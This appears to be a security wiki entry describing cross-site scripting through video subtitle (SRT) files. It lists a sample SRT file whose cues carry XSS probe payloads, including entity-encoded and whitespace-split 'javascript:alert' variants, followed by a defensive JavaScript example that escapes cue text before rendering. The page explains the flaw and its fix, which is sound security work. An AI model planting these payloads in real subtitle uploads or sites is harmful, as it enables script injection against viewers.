XSS in subtitle

Description
It is possible for an attacker to execute JavaScript in a video's subtitle. This is also referred to as XSS (Cross-Site Scripting). If a website loads the subtitle separately in the browser, then an attacker can run any HTML or JavaScript in the video subtitle. It has been tested on some video services.

Examples
The attacker can save the contents below in SRT format and upload the prepared SRT file as a video's subtitles:

1 00:00:37,618 --> 00:00:42,557 : '';!--"=&{}

2 00:00:58,425 --> 00:01:00,704 

3 00:01:00,705 --> 00:01:01,873 

4 00:01:02,225 --> 00:01:04,519 

5 00:01:04,520 --> 00:01:05,547 

6 00:01:05,864 --> 00:01:08,117 

7 00:01:08,224 --> 00:01:09,223 alert("XSS")">

8 00:01:09,224 --> 00:01:10,434 

9 00:01:11,384 --> 00:01:12,427 

10 00:01:15,504 --> 00:01:17,506 

11 00:01:19,743 --> 00:01:20,786 

12 00:01:24,183 --> 00:01:25,351 

13 00:01:40,663 --> 00:01:41,705 

14 00:01:42,703 --> 00:01:45,742 <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;>

15 00:01:45,743 --> 00:01:46,285 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

16 00:01:48,503 --> 00:01:49,545 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

17 00:01:49,582 --> 00:01:51,709 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

18 00:01:54,822 --> 00:01:58,200 <IMG SRC="jav&#x09;ascript:alert('XSS');">

19 00:02:01,021 --> 00:02:03,691 <IMG SRC="jav&#x0A;ascript:alert('XSS');">

20 00:02:04,702 --> 00:02:05,744 <IMG SRC="jav&#x0D;ascript:alert('XSS');">

21 00:02:15,700 --> 00:02:18,536 <IMG SRC="javascript:alert('XSS')"

22 00:02:18,740 --> 00:02:22,619 \";alert('XSS');//
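
On the rendering side, the fix is to treat cue text as data and never as markup. The following is an added example, not code from the original page: it parses SRT cues and HTML-encodes the text before it reaches the page, including `&`, so the entity-encoded variants above are displayed literally. The names `parseSrt`, `escapeHtml`, `renderCue` and the sample file are assumptions made for illustration.

```javascript
// Added example (not from the original page). All names are hypothetical.
const TIMING = /^(\d{2}:\d{2}:\d{2},\d{3})\s*-->\s*(\d{2}:\d{2}:\d{2},\d{3})/;

// Split an SRT document into cues. Cue text is kept as an opaque string.
function parseSrt(srt) {
  const cues = [];
  for (const block of srt.replace(/\r\n?/g, "\n").split(/\n{2,}/)) {
    const lines = block.split("\n").filter((l) => l.trim() !== "");
    const at = lines.findIndex((l) => TIMING.test(l));
    if (at === -1) continue; // no timing line: skip rather than guess
    const [, start, end] = lines[at].match(TIMING);
    cues.push({ start, end, text: lines.slice(at + 1).join("\n") });
  }
  return cues;
}

// Encode every character that can open a tag, an attribute or an entity.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Produce the HTML for one cue. The only markup in the result is the <br>
// inserted here for line breaks; everything from the file is encoded.
function renderCue(cue) {
  return escapeHtml(cue.text).replace(/\n/g, "<br>");
}

// Constructed sample: one benign cue plus two cue texts taken from the
// example above (timings of cue 3 are constructed).
const SAMPLE_SRT = [
  "1",
  "00:00:01,000 --> 00:00:02,000",
  "Hello & welcome",
  "",
  "2",
  "00:02:15,700 --> 00:02:18,536",
  "<IMG SRC=\"javascript:alert('XSS')\"",
  "",
  "3",
  "00:02:20,000 --> 00:02:21,000",
  "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
].join("\n");
```

In a browser, assigning the raw cue text to an element's `textContent` gives the same result without building an HTML string at all.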

Authors and Primary Editors

Mohammad MortazaviZade - 2mzrp2@gmail.com

Related Attacks
XSS Attacks